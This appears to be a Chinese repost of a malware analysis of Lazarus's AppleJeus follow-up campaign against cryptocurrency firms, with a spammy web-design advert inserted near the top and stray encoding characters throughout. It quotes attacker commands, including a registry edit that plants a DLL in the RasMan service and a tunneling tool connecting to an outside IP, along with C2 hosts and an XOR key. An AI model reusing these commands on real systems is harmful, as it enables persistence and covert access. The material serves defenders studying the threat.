這篇文章主要為大家分析了怎樣進行AppleJeus行動分析的相關知識點,內(nèi)容詳細易懂�,操作細節(jié)合理,具有一定參考價值�。如果感興趣的話,不妨跟著跟隨小編一起來看看�����,下面跟著小編一起深入學習“怎樣進行AppleJeus行動分析”的知識吧��。
科爾沁右翼中網(wǎng)站建設公司創(chuàng)新互聯(lián),科爾沁右翼中網(wǎng)站設計制作�,有大型網(wǎng)站制作公司豐富經(jīng)驗。已為科爾沁右翼中數(shù)千家提供企業(yè)網(wǎng)站建設服務�。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設公司要多少錢���,請找那個售后服務好的科爾沁右翼中做網(wǎng)站的公司定做!
Lazarus組織是目前最活躍的APT組織之一�。 2018年,卡巴斯基針發(fā)現(xiàn)由該組織發(fā)起的名為AppleJeus的攻擊行動���。該行動是Lazarus首次針對macOS用戶的攻擊��,為了攻擊macOS用戶���,Lazarus開發(fā)了macOS惡意軟件并添加身份驗證機制,其可以非常仔細謹慎的下載后一階段的有效負載���,并在不落盤的情況下加載下一階段的有效負載�。為了攻擊Windows用戶��,他們制定了多階段感染程序�����。在“ AppleJeus”行動分析發(fā)布后�,Lazarus在進行攻擊時變得更加謹慎,采用了更多多方法來避免被發(fā)現(xiàn)。
AppleJeus后續(xù)
發(fā)布AppleJeus行動分析后����,Lazarus繼續(xù)使用類似的作案手法來破壞加密貨幣業(yè)務����,研究人員發(fā)現(xiàn)了更多與AppleJeus中的macOS惡意軟件類似的惡意軟件。 該macOS惡意軟件使用公共代碼來開發(fā)安裝程序�����。 惡意軟件使用了Centrabit開發(fā)的QtBitcoinTrader����。
這三個macOS安裝程序使用相似的后安裝程序腳本植入有效負載,并在執(zhí)行獲取的第二階段有效負載時使用相同的命令���。此外還識別出的另一類型macOS惡意軟件MarkMakingBot.dmg(be37637d8f6c1fbe7f3ffc702afdfe1d)�����,該惡意軟件創(chuàng)建于2019-03-12����,但網(wǎng)絡通信并未加密,推測這是macOS惡意軟件改造升級的中間階段���。
Windows惡意軟件的變化
持續(xù)跟蹤此活動中發(fā)現(xiàn)一名受害者在2019年3月受到Windows AppleJeus惡意軟件的攻擊����。確定感染始于名為WFCUpdater.exe的惡意文件�,攻擊者使用了一個假網(wǎng)站:wfcwallet [.] com。
攻擊者像以前一樣使用了多階段感染����,但是方法發(fā)生了變化。 感染始于.NET惡意軟件�,其被偽裝成WFC錢包更新程序(a9e960948fdac81579d3b752e49aceda)。此.NET文件執(zhí)行后會檢查命令行參數(shù)是否為“ / Embedding”����。 該惡意軟件負責使用硬編碼的20字節(jié)XOR密鑰(82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62)解密同一文件夾中的WFC.cfg文件。其后連接到C2服務器:
wfcwallet.com (resolved ip: 108.174.195.134)
www.chainfun365.com(resolved ip: 23.254.217.53)
之后會執(zhí)行攻擊者的命令����,安裝下一階段的有效負載。 攻擊者將兩個文件放置到受害者系統(tǒng)文件夾中:rasext.dll和msctfp.dat����。他們使用RasMan(遠程訪問連接管理器)Windows服務注冊下一階段有效負載。 經(jīng)過基本偵察后,攻擊者使用以下命令手動植入有效載荷:
cmd.exe /c dir rasext.dll
cmd.exe /c dir msctfp.dat
cmd.exe /c tasklist /svc | findstr RasMan
cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f
為了建立遠程隧道���,攻擊者使用命令行參數(shù)植入了更多的相關工具�,但研究人員沒有獲得更多的工具文件��。
Port opener:
%APPDATA%\Lenovo\devicecenter\Device.exe 6378
Tunneling tool:
%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
macOS惡意軟件變化
JMTTrading
在跟蹤此攻擊活動時發(fā)現(xiàn)了macOS惡意軟件變體��。攻擊者將其假網(wǎng)站和應用程序稱為JMTTrading��,其他研究人員和安全廠商也發(fā)布了其大量技術細節(jié)���。在這里強調(diào)一下這次攻擊的不同之處。
攻擊者使用GitHub來托管其惡意應用程序���。
惡意軟件作者在其macOS惡意軟件中使用了Object-C而不是QT框架��。
該惡意軟件在macOS可執(zhí)行文件中實現(xiàn)了簡單的后門功能���。
與以前的情況類似,使用16字節(jié)XOR密鑰加密/解密的惡意軟件���。
Windows版本的惡意軟件使用了ADVobfuscator來隱藏其代碼�����。
macOS惡意軟件的安裝腳本與以前的版本有顯著差異���。
UnionCryptoTrader
還確定了另一項針對macOS的攻擊��。惡意程序名為UnionCryptoTrader���,安全研究員 dineshdina04發(fā)現(xiàn)了一個相同的案例,該攻擊總結如下:
安裝腳本與JMTTrading使用的腳本相同�。
惡意軟件作者使用SWIFT開發(fā)了此macOS惡意軟件。
惡意軟件作者更改了從收集信息的方法��。
該惡意軟件開始使用auth_signature和auth_timestamp參數(shù)進行身份驗證���,以便傳遞第二階段有效負載���。
該惡意軟件無需落盤即可加載下一階段的有效負載。
Windows版本的UnionCryptoTrader
研究人員找到了Windows版本的UnionCryptoTrader(0f03ec3487578cef2398b5b732631fec)�����。它是從Telegram Messenger下載并執(zhí)行:
C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe
此外在假網(wǎng)站上找到了攻擊者的Telegram����,可以高度確認攻擊者使用Telegram Messenger發(fā)送安裝程序���。由于有效負載僅在內(nèi)存中執(zhí)行,因此無法獲取所有相關文件�����。 整個感染過程與WFCWallet非常相似���,但是增加了注入過程。
Windows版本的UnionCryptoTrader具有以下窗口��,顯示幾個加密貨幣的價格圖表�����。
Windows版本的UnionCryptoTrader更新程序(629b9de3e4b84b4a0aa605a3e9471b31)與macOS版本功能相似���。 根據(jù)構建路徑(Z:\Loader\x64\Release\WinloaderExe.pdb)�����,惡意軟件作者將此惡意軟件稱為加載程序����。 啟動后,該惡意軟件會檢索受害者的基本信息����,并以HTTP POST發(fā)送該信息。
如果C2服務器的響應為200���,則惡意軟件會解密有效負載并將其加載到內(nèi)存中����。最后惡意軟件發(fā)送act=done�。從此加載程序下載的下一階段有效負載(e1953fa319cc11c2f003ad0542bca822)與WFCWallet的.NET下載程序相似。該惡意軟件負責解密同一文件夾中的Adobe.icx文件�����,將下一個有效負載注入Internet Explorer進程���,并執(zhí)行攻擊者的命令���。
最終的有效載荷(dd03c6eb62c9bf9adaf831f1d7adcbab)與WFCWallet相同是通過手動植入的。惡意軟件作者根據(jù)先前收集的信息植入僅在特定系統(tǒng)上有效的惡意軟件����。該惡意軟件會檢查受感染系統(tǒng)的信息�����,并將其與給定值進行比較��。
Windows惡意軟件將加密的msctfp.dat文件加載到系統(tǒng)文件夾中����,并加載每個配置��。 它根據(jù)該文件的內(nèi)容執(zhí)行附加命令����。當惡意軟件與C2服務器通信時會使用預定義標頭的POST請求���。
初始通信惡意軟件首先發(fā)送參數(shù):
cgu:來自配置的64bits十六進制值
aip:配置中的MD5哈希值
sv:硬編碼值
如果來自C2服務器的響應為200���,惡意軟件會發(fā)送帶有加密數(shù)據(jù)和隨機值的下一個POST請求,攻擊者使用隨機值來識別每個受害者并驗證POST請求����。
imp:隨機產(chǎn)生的值
dsh:imp的異或值
hb_tp:imp的異或值(key:0x67BF32)
hb_dl:加密的數(shù)據(jù)發(fā)送到C2服務器
ct:硬編碼值
最后��,惡意軟件下載下一階段的有效負載��,對其進行解密�。
此外在調(diào)查其基礎架構時發(fā)現(xiàn)了幾個仍在線的假冒網(wǎng)站�。
總結
AppleJeus后續(xù)行動中找到幾名受害者分布在英國,波蘭��,俄羅斯和中國���,一些受害者與加密貨幣業(yè)務有關����。
攻擊者改變了macOS和Windows惡意軟件�,在macOS下載器中添加了身份驗證機制并更改了macOS開發(fā)框架。 Windows系統(tǒng)中的感染過程與以前的不同����。Lazarus組織為獲取經(jīng)濟利益而進行攻擊會一直持續(xù)。
關于“怎樣進行AppleJeus行動分析”就介紹到這了,更多相關內(nèi)容可以搜索創(chuàng)新互聯(lián)以前的文章���,希望能夠幫助大家答疑解惑���,請多多支持創(chuàng)新互聯(lián)網(wǎng)站����!
文章標題:怎樣進行AppleJeus行動分析
當前鏈接:
http://weahome.cn/article/goegij.html
重慶分公司
重慶分公司
